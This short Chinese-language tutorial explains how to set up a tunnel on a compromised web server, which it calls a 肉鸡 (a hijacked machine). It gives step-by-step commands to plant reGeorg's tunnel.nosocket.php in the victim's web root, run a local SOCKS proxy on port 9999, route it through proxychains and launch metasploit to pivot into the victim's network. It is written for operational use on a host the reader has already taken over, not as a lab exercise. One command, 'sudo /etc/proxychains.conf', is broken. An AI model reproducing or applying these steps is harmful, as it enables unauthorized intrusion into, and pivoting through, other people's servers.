在肉鸡上搭建隧道

首先确认你的肉鸡是个web服务器，然后在自己的kali机子上做如下配置：

1. git clone http://bgithub.xyz/sensepost/reGeorg.git
   
2. pip install urllib3
   
3. sudo apt install proxychains
   
4. cd reGeorg && ls

复制代码

看到目录下有一个tunnel.nosocket.php文件，复制到肉鸡的web发布目录，接下来在自己的机子上操作：

1. python reGeorgSocksProxy.py -p 9999 -u http://example.com/tunnel.nosocket.php

复制代码

-> 这行命令运行后会将代理映射到自己机子的9999端口上
编辑proxychains配置：

1. sudo /etc/proxychains.conf

复制代码

加入一行内容：

1. socks5 127.0.0.1 9999

复制代码

配置完成！挂上代理运行metasploit：

1. proxychains msfconsole

复制代码